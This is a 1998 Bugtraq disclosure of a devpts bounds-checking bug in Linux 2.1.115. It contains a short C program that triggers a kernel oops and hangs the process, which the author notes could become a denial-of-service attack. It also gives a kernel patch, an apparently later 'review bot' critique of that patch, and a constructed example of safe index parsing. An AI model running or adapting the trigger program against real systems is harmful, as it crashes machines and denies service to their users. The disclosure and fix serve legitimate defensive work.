Bugtraq mailing list archives

Linux 2.1.115 oops (demo and fix)


From: dps () IO STARGATE CO UK (Duncan Simpson)
Date: Thu, 13 Aug 1998 19:02:40 +0100


2.1.115 devpts contains a bug that can prevent you from unmounting file systems,
and the exploit program sticks in uninterruptible sleep until you reboot. It may
be possible to trash kernel data structures using the bug with difficulty. I
have yet to try both ends of a pty using ptmx and devpts. I assume other versions
are vulnerable too.

For purposes of demonstrating the bug assume devpts is mounted on /dev/pts.
My observations suggest the following program should tickle the bug:

/* devpts bug tickler, hits 2.1.115 */
/* WARNING: This program enters uninterruptible sleep when the kernel
 * oopses, so real programmers can turn this into a process table
 * eating DoS attack. */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
   int i,fd;
   char name[256];

   i=257;                      /* start beyond the number of ptys devpts knows about */
   while(1)
   {
       sprintf(name, "/dev/pts/%d", i);
       fd=open(name, O_RDWR);  /* open(2), not fopen(3): O_RDWR is an open() flag */
       if (fd >= 0)
           close(fd);          /* on a fixed kernel the open may succeed; don't leak fds */
       i++;
   }
}


The bug is a bounds checking failure in the root_lookup function in
linux/fs/devpts/root.c. Here is a patch that fixes the bug. Given it
is referencing memory it should not be viewing and the bad data is passed
back to real_lookup (which promptly oopses), more spectacular effects may
be possible. The only way to use a terminal running such a program again is
apparently to reboot, due to the uninterruptible sleep that the program
which made the system call enters.

--- fs/devpts/root.c.dist       Thu Aug 13 17:54:17 1998
+++ fs/devpts/root.c    Thu Aug 13 17:56:54 1998
@@ -159,6 +159,8 @@
                        entry += (*p++ - '0');
                }
        }
+       if (entry>=sbi->max_ptys) /* Check range of number */
+          return 0;

        dentry->d_inode = sbi->inodes[entry];
        if ( dentry->d_inode )
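Review bot: the added `if (entry>=sbi->max_ptys)` check only catches large positive values; `entry` is accumulated digit by digit in the loop just above (`entry += (*p++ - '0')`), so a long enough digit string overflows it, and if `entry` is a signed int the wrapped negative value passes the check and still indexes `sbi->inodes[entry]` out of range. Consider bailing out inside the loop as soon as the accumulated value reaches `sbi->max_ptys` (or make `entry` unsigned and keep the upper-bound test), and also confirm that returning 0 before `d_inode` is set is the result real_lookup expects for a nonexistent name, since the visible tail of the function is skipped by the early return. Minor: `return 0;` is indented with spaces where the surrounding lines use tabs.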

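To make the shape of that check concrete, here is an added C example; it is not the poster's code and not the kernel's devpts code, but a user-space stand-in for the number parsing in root_lookup. The names `struct pts_table`, `parse_pty_index`, `pts_lookup` and `demo_table` are all constructed for this example. It goes a little beyond the patch: besides rejecting an index at or above `max_ptys`, it rejects non-digit characters and digit strings that would overflow the accumulator, which is the case the one-line range check on a signed int does not cover.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the devpts superblock info: a table with one
 * inode slot per pty (NULL = no pty allocated there) and its length. */
struct pts_table {
    int max_ptys;
    const char *const *inodes;
};

/* Parse a pty name such as "12" into an index, digit by digit as the
 * 2.1.115 loop does, but reject anything that is not a plain decimal
 * number, anything that would overflow int, and anything at or beyond
 * max_ptys. Returns the index, or -1 for an invalid or out-of-range name. */
int parse_pty_index(const char *name, size_t len, int max_ptys)
{
    int entry = 0;
    size_t i;

    if (len == 0 || max_ptys <= 0)
        return -1;

    for (i = 0; i < len; i++) {
        int digit = name[i] - '0';
        if (digit < 0 || digit > 9)
            return -1;                      /* not a decimal digit */
        if (entry > (INT_MAX - digit) / 10)
            return -1;                      /* accumulator would overflow */
        entry = entry * 10 + digit;
        if (entry >= max_ptys)
            return -1;                      /* the bound the patch adds, checked early */
    }
    return entry;
}

/* Look up the inode slot for a name; never indexes outside the table. */
const char *pts_lookup(const struct pts_table *tbl, const char *name)
{
    int idx = parse_pty_index(name, strlen(name), tbl->max_ptys);
    if (idx < 0)
        return NULL;                        /* negative dentry: no such pty */
    return tbl->inodes[idx];
}

/* Constructed sample table: four slots, slot 1 unallocated. */
static const char *const demo_inodes[4] = { "pty0", NULL, "pty2", "pty3" };
const struct pts_table demo_table = { 4, demo_inodes };

int main(void)
{
    const char *names[] = { "0", "1", "3", "4", "257", "1a", "99999999999" };
    size_t n;

    for (n = 0; n < sizeof(names) / sizeof(names[0]); n++) {
        const char *inode = pts_lookup(&demo_table, names[n]);
        printf("/dev/pts/%-12s -> %s\n", names[n], inode ? inode : "(none)");
    }
    return 0;
}
```

Checking the bound inside the loop means a name like "99999999999" is refused as soon as the partial value reaches `max_ptys`, so the overflow guard is only a second line of defence; either alone would have stopped the original program's "/dev/pts/257".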

